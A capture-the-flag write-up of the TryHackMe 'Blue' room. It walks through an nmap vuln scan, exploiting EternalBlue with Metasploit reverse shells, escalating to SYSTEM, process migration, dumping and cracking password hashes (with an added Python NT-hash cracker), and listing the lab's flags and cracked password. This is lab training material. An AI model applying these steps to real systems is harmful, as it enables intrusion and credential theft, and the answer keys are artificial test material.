
TryHackMe - Blue Writeup



RECONNAISSANCE

From a reconnaissance point of view there isn't much to do except noting down the IP address of the machine. You can also download this room as a virtual disk file and run it on an instance of VirtualBox or VMware. Another thing to be mindful of is that the machine takes some time to boot, so try pinging it before moving on to an nmap scan.


SCANNING AND ENUMERATION

I went ahead with an aggressive scan while also utilizing nmap's scripting engine to fire up the scripts in the vuln category. The command was nmap -n -Pn -T5 -A --script=vuln <IP_Address>, wherein the arguments are

  • -n: To turn off DNS resolution
  • -Pn: To skip the ping and directly go ahead with scanning the IP address, as I knew it was alive
  • -T5: To increase the timing template to the maximum speed
  • -A: To perform an aggressive scan, which combines script scanning, OS fingerprinting and service detection of the open ports
  • --script=vuln: A category of nmap scripts that probe the target for potential vulnerabilities


This essentially provides us with the answers for Task 1:

1. Scan the machine - Done
2. How many ports are open with a port number under 1000? - 3, which are 135 (msrpc), 139 (netbios-ssn) and 445 (microsoft-ds)
3. What is this machine vulnerable to? - ms17-010, which is conveniently provided to us under the heading VULNERABLE. If you google this vulnerability you'll come up with its name, EternalBlue, hence the name of this machine.
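Since the two scan questions above are answered by reading the nmap output, here is an added example (not part of the original writeup) that extracts the same answers from nmap's XML output, as produced with -oX scan.xml on top of the command shown above. The XML embedded below is a constructed, abbreviated sample in nmap's layout (the IP, the extra 3389/49152 ports and the script table key are assumptions), so the script runs offline; point parse_scan at a real -oX file to use it for real.

```python
# Added example, not from the original writeup: answer the Task 1 questions
# (open ports under 1000, vuln-script findings) from nmap -oX output.
import xml.etree.ElementTree as ET

# Constructed sample that mirrors nmap's -oX layout (abbreviated; a real file
# carries more attributes). IP, port set and the table key are assumptions.
SAMPLE_NMAP_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -n -Pn -T5 -A --script=vuln 10.10.10.10">
  <host>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="49152"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
        <table key="ms17-010">
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
      <script id="smb-vuln-ms10-054" output="false"/>
    </hostscript>
  </host>
</nmaprun>
"""


def open_ports(xml_text, below=1000):
    """Return sorted (port, service) pairs that are open and numbered below `below`."""
    root = ET.fromstring(xml_text)
    found = []
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue
        num = int(port.get("portid"))
        if num < below:
            svc = port.find("service")
            found.append((num, svc.get("name") if svc is not None else "unknown"))
    return sorted(found)


def vulnerable_scripts(xml_text):
    """Return the ids of NSE scripts that reported a VULNERABLE state."""
    root = ET.fromstring(xml_text)
    hits = []
    for script in root.iter("script"):
        # Vuln scripts record their verdict in an <elem key="state"> entry;
        # the summary in the output attribute is used as a fallback.
        states = [e.text for e in script.iter("elem") if e.get("key") == "state"]
        summary = script.get("output") or ""
        if "VULNERABLE" in states or summary.startswith("VULNERABLE"):
            hits.append(script.get("id"))
    return hits


def parse_scan(path):
    """Convenience wrapper for a real `nmap -oX path` file."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return open_ports(text), vulnerable_scripts(text)


if __name__ == "__main__":
    ports = open_ports(SAMPLE_NMAP_XML)
    print(f"{len(ports)} open ports under 1000: {ports}")
    print("vulnerable to:", vulnerable_scripts(SAMPLE_NMAP_XML))
```

The closed port 80 and the ports at or above 1000 are deliberately present in the sample so the filter is exercised; a real Blue scan also shows 3389 and a run of ephemeral RPC ports, which is why the question restricts itself to ports under 1000.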


EXPLOITATION

Since we know what the vulnerability is, the next step is to exploit it with Metasploit. Use the search command to look for modules which could help us leverage it to gain a shell on the system.



We can use the first exploit here, named exploit/windows/smb/ms17_010_eternalblue. Use it and execute the show options command to take a look at the fields which need to be modified. The only field which needs to be filled is RHOSTS, which takes the IP address of the machine. Before running this module we need to manually define the payload for it; TryHackMe suggests a simple command shell, which is the payload named windows/x64/shell/reverse_tcp. However, a better option is a more capable payload such as Meterpreter, which is selected with windows/x64/meterpreter/reverse_tcp.

So once you've selected your payload of choice, it's time to run the exploit, sit back and watch the magic. At this point we have also completed Task 2:

  1. Start Metasploit - done with the command msfconsole
  2. Find the exploitation code we will run against the machine - exploit/windows/smb/ms17_010, which was discovered with the help of the search command
  3. Show options and set the one required value - RHOSTS was the only one that needed to be filled
  4. With that done, run the exploit! - done with the run command
  5. Confirm that the exploit has run correctly - done when we get our shell back

POST EXPLOITATION

At this point you will have either a Windows command shell or a Meterpreter shell, depending on your chosen payload. If you chose Meterpreter you can skip the following steps; if you chose the Windows shell, we'll have to upgrade it to Meterpreter to gain some added functionality.

In order to do that we'll have to select a specific post-exploitation module, which is accessed from the msf6 prompt. To get back to it you can either execute the background command or press Ctrl+Z. Now search for the module named post/multi/manage/shell_to_meterpreter and use it. If you execute the show options command you'll see that you need to fill the SESSION field. For this you need to know your session number, which can be queried with the sessions -i option. Fill the SESSION field accordingly and run it. To switch back to your shell you can use the sessions -i <session_number> command.

PRIVILEGE ESCALATION
To check your privileges you can use the getuid command. The next step is to escalate your privileges to the administrator, for which we'll use the command called getsystem.

From here we'll migrate to another process to gain a stronger foothold. This is done so that our access persists even if the host closes our current process, so we migrate to an important process such as winlogon.exe or lsass.exe, which is less likely to be closed. To do this, execute the ps command, which lists the processes running on the system along with their details.

Note the PID (process ID) of a process whose user is NT AUTHORITY\SYSTEM, which is the Windows way of saying that it is an admin process. You'll use this process ID to move into that process. The command for that is migrate <process_ID>.

Task 4 has been completed:

  1. If you haven't already, background the previously gained shell - done with background or Ctrl+Z
  2. What option are we required to change? - session
  3. Set the required option, you may need to list all of the sessions to find your target here - done with sessions -i
  4. Run - done with the run command
  5. Once the meterpreter shell conversion completes, select that session for use - done with sessions -i <session_id>
  6. Verify that we have escalated to NT AUTHORITY\SYSTEM - done with the getuid command
  7. List all of the processes running via the 'ps' command. Find a process that is running at NT AUTHORITY\SYSTEM - done
  8. Migrate to this process - done with the command migrate <process_id>

PASSWORD CRACKING
The next step is to obtain the system's password, which would allow us to log into it. For this we can use the hashdump command, which magically provides us with the usernames and hashed passwords. There are several ways to crack these hashes: an automated way is to submit them to crackstation.net, but if you love the terminal like me and don't want to leave it, there are solutions for folks like us too. You can use either hashcat or John the Ripper to crack them. When you run john on the dump you'll get a message saying that the hashes could be in the NT or LM format; it defaults to LM and is unable to crack them. Therefore you supply it the format as NT along with a dictionary such as rockyou.txt, as shown below.


This marks the completion of Task 4:
  1. What is the name of the non-default user? - Jon
  2. What is the cracked password? - alqfna22
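To make the NT-versus-LM point above concrete, here is an added example (not part of the original writeup) that implements the NT hash itself (MD4 over the UTF-16LE password, per RFC 1320) and runs a small dictionary attack over a hashdump-style line. The line and the wordlist are constructed: the user "demo" and its NT hash of the word "password" are assumptions, not Jon's real hash. The LM field holds the well-known constant for an empty LM hash, which is exactly why john's default LM mode finds nothing on this box and --format=NT is needed.

```python
# Added example, not from the original writeup: NT hash (MD4 of UTF-16LE) in
# pure Python, a hashdump line parser, and a tiny dictionary attack.
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Implemented here because OpenSSL 3 ships md4 as a legacy algorithm."""
    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)                       # padding: 1 bit, zeros, 64-bit LE length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        # Each step updates `a`, then the registers rotate so the next step
        # updates what was `d`; four steps bring them back to (a, b, c, d).
        for j in range(16):                                    # round 1
            a = _rotl((a + F(b, c, d) + X[j]) & MASK32, (3, 7, 11, 19)[j % 4])
            a, b, c, d = d, a, b, c
        for j in range(16):                                    # round 2
            k = (j % 4) * 4 + j // 4                           # 0,4,8,12,1,5,...
            a = _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[j % 4])
            a, b, c, d = d, a, b, c
        for j in range(16):                                    # round 3
            k = (0, 8, 4, 12)[j % 4] + (0, 2, 1, 3)[j // 4]    # 0,8,4,12,2,10,...
            a = _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[j % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK32, (B + b) & MASK32, (C + c) & MASK32, (D + d) & MASK32
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), unsalted, as stored in the SAM."""
    return md4(password.encode("utf-16-le")).hex()


# LM hash of an empty/disabled LM password; what hashdump shows when LM storage is off.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed hashdump-style line: user:rid:LM:NT:::  (NT hash is of "password")
SAMPLE_HASHDUMP = "demo:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"


def parse_hashdump(line: str) -> dict:
    user, rid, lm, nt, *_ = line.strip().split(":")
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def crack_nt(entries, wordlist):
    """Dictionary attack: hash every candidate once, then look each NT hash up."""
    lookup = {nt_hash(word): word for word in wordlist}
    return {e["user"]: lookup[e["nt"]] for e in entries if e["nt"] in lookup}


if __name__ == "__main__":
    entry = parse_hashdump(SAMPLE_HASHDUMP)
    if entry["lm"] == EMPTY_LM:
        print(f"{entry['user']}: LM field is the empty-LM constant, crack the NT hash")
    print(crack_nt([entry], ["letmein", "password", "alqfna22"]))
```

Because the NT hash is unsalted, the candidate hashes are computed once and reused for every user in the dump, which is the same property that makes rainbow tables and sites like crackstation.net effective against it.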

FINDING FLAGS
In this task we know that the flags follow the format flag, followed by a number, followed by .txt, e.g. flag1.txt, flag2.txt, etc. We can leverage this to find all of the flags in a single go.

1. Open a command prompt and cd to the root of the C: drive. Then use the following command to search the whole filesystem for the flags: dir /S flag*

2. Another approach is to create a file containing a listing of the whole filesystem. This file can be saved as .txt and searched with Notepad's find function. The command for it would be tree /d > C:/Users/Jon/file.txt




3. The slowest method is to search for them using Windows Search.

Task 5 is completed:
1. Flag1.txt - flag{access_the_machine}, found in the root directory of C:
2. Flag2.txt - flag{sam_database_elevated_access}, found in C:/Windows/System32/config
3. Flag3.txt - flag{admin_documents_can_be_valuable}, found in C:/Users/Jon/My Documents
